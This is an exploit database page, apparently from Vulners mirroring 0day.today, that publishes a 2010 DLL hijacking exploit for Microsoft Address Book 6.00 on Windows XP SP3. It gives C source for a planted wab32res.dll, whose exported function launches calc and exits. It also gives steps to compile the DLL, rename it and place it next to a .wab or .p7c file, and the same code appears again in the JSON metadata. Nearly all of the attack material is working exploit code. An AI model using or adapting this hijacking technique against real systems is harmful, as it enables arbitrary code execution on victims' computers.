Search...

Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit

2010-08-25T00:00:00

ID 1337DAY-ID-13821
Type zdt
Reporter Beenu Arora
Modified 2010-08-25T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            ===========================================================
Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit
===========================================================

/*
# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora
# Site : www.beenuarora.com

Exploit Title: Microsoft Address Book DLL Hijacking
Date: 25/08/2010
Author: Beenu Arora
Tested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512
Vulnerable extensions: wab , p7c

Compile and rename to wab32res.dll, create a file in the same dir with one
of the following extensions:
.wab,p7c
*/

#include &lt;windows.h&gt;
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}



#  0day.today [2018-04-11]  #

JSON Vulners Source

Initial Source

{"id": "1337DAY-ID-13821", "type": "zdt", "bulletinFamily": "exploit", "title": "Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit", "description": "Exploit for windows platform in category local exploits", "published": "2010-08-25T00:00:00", "modified": "2010-08-25T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/13821", "reporter": "Beenu Arora", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-11T15:54:28", "viewCount": 7, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/13821", "sourceData": "===========================================================\r\nMicrosoft Address Book 6.00.2900.5512 DLL Hijacking Exploit\r\n===========================================================\r\n\r\n/*\r\n# Greetz to :b0nd, Fbih2s,r45c4l,Charles ,j4ckh4x0r, punter,eberly, Charles, Dinesh Arora , Anirban , Dinesh Arora\r\n# Site : www.beenuarora.com\r\n\r\nExploit Title: Microsoft Address Book DLL Hijacking\r\nDate: 25/08/2010\r\nAuthor: Beenu Arora\r\nTested on: Windows XP SP3 , Microsoft Address Book 6.00.2900.5512\r\nVulnerable extensions: wab , p7c\r\n\r\nCompile and rename to wab32res.dll, create a file in the same dir with one\r\nof the following extensions:\r\n.wab,p7c\r\n*/\r\n\r\n#include <windows.h>\r\n#define DLLIMPORT __declspec (dllexport)\r\n\r\nDLLIMPORT void hook_startup() { evil(); }\r\n\r\nint evil()\r\n{\r\n WinExec(\"calc\", 0);\r\n exit(0);\r\n return 0;\r\n}\r\n\r\n\n\n# 0day.today [2018-04-11] #", "_state": {"dependencies": 1645296786}}